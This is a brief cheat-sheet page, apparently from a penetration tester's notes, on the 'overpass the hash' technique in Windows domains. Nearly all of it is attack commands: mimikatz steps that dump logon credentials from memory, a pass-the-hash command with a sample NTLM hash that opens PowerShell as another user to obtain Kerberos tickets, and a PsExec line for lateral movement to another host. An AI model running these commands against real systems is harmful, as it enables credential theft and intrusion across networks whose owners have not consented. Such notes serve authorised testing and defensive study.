Overpass the Hash

Create Kerberos tickets using a users NTLM hash and mimikatz

Obtain hash

privilege::debug
sekurlsa::logonpasswords

Request ticket

sekurlsa::pth /user:adot /domain:adot.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

Powershell will start as the new user. Test by using a restricted resource and viewing TGT's

net use \\restricted01
klist

Can use PsExec to move laterally

.\PsExec.exe \\web04 cmd

Last updated 7 months ago